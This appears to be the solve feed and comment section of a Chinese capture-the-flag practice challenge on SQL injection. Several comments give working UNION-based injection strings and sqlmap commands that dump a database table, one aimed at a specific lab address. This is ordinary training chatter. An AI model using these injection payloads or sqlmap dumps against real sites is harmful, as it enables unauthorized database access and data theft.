评分(24)
解题动态
miiko 攻破了该题 10分钟前
anton_小金鱼 攻破了该题 3小时前
L! 攻破了该题 9小时前
box 攻破了该题 12小时前
911 攻破了该题 22小时前
LHM 攻破了该题 23小时前
yue 攻破了该题 23小时前
HZ 攻破了该题 23小时前
wyc 攻破了该题 23小时前
小蓝01 攻破了该题 23小时前
wh 攻破了该题 23小时前
diffni 攻破了该题 23小时前
dianci 攻破了该题 23小时前
cww 攻破了该题 23小时前
qyy 攻破了该题 23小时前
ghj 攻破了该题 23小时前
_T_ 攻破了该题 23小时前
lkgjlkglkw 攻破了该题 23小时前
popppyy 攻破了该题 1天前
评论
AAA浙江皮革城汪总 3年前
举报
sqlmap -u "http://114.67.175.224:10435/index.php" --data "id=1" --dump
zoey123 3年前
举报
很好,适合新手
sudopacman 3年前
举报
萌新打得最心惊胆战的一道题,第一次碰sqlmap,不知道为什么-u "[path]"出来一直报错,最后手工暴力做出来了
4549 3年前
举报
赞,很适合新手
goodfxxkingbye 3年前
举报
id=-1' union select 1,2,3,group_concat(skctf_flag) from fl4g#
him9947 2年前
举报
你是我大哥
lzh20030509 3年前
举报
评论区yyds
15305265925 3年前
举报
id=-1' union select 1,2,group_concat(skctf_flag),4 from fl4g-- -
xiaoxhw 3年前
举报
利用”不显示“代表”报错“
笨笨笨蛋 3年前
举报
我sqlmap进入fl4g后查看内容压根没有flag,可是手工注入又有了,这是为什么?求一个大佬解释一下
aWxvdmVjdGY 3年前
举报
fl4g 是db,然后找table,在找cloumns,最后dump
教练我要打亚索 3年前
举报
先猜一下字段,我也是没猜字段直接取数据 没取到,需要先取一下字段 然后再来取数据
笨笨笨蛋 3年前
举报
有大佬用sqlmap做的吗?我想看看sqlmap怎么做这个题目
摆烂选手 2年前
举报
@charonzzw 阿巴阿巴,摆烂选手大眼瞪小眼,咋搞啊。有没有会的,哭了
theonlypopcat 3年前
举报
sqlmap --url="http://靶场地址/index.php" --data="id=1" -D skctf -T fl4g -C skctf_flag --dump
charonzzw 3年前
举报
用burp去抓包 然后copy to flie 形成txt文件,sqlmap去运行这个包 然后依次查库 表 列就出flag了